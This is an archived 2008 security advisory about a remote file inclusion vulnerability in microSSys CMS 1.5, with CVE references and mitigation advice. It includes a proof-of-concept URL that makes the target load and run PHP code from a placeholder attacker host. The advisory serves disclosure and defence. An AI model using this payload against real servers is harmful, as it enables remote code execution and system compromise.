- 28 May 2008Advisories » microSSys CMS "PAGES[]" Parameter Handling Remote File Inclusion Vulnerability
| Release Date: | 20/05/2008 | Severity: | Highly Critical  |
| SecWatch Advisory: | SWID1021238 | Cause: | Input validation error |
| Solution Status: | Unpatched | Impact: | Disclosure of system information Execution of arbitrary code |
| Exploit Status: | PoC Available | Access Vector: | From remote |
| Affected Software: | microSSys CMS 1.x | ||
| References: | http://milw0rm.com/exploits/5651 |
||
| CVE: | CVE-2008-2396 | ||
| Secunia: | SA30264 | ||
| Bugtraq ID: | BID#29278 | ||
Description:
An input validation vulnerability in microSSys CMS has been reported, which can be exploited by remote users to disclose sensitive information and compromise a vulnerable system.
User-supplied input passed to the "PAGES[]" parameter in index.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from external and local resources, such as arbitrary PHP code which will be executed by the target web service. The PHP code, including operating system commands, will run with the privileges of the target web service.
Note: Successful exploitation requires "register_globals" is enabled.
Affected:
microSSys CMS version 1.5. Other versions may also be affected.
Proof of Concept:
Arbitrary File Inclusion:
http://[target]/index.php?1=lol&PAGES[lol]=http://[attacker]/cmd.php
Solution:
There was no vendor-supplied solution at the time of entry.
Edit source code manually to ensure user-supplied input is correctly sanitised.
Filter malicious characters and character sequences via a HTTP proxy or firewall with URL filtering capabilities.
Credits:
Raz0r
Free Vulnerability Notification Service
Receive free instant and customisable notifications of new vulnerabilities or exploits via e-mail, web or RSS feeds. Click here for more information.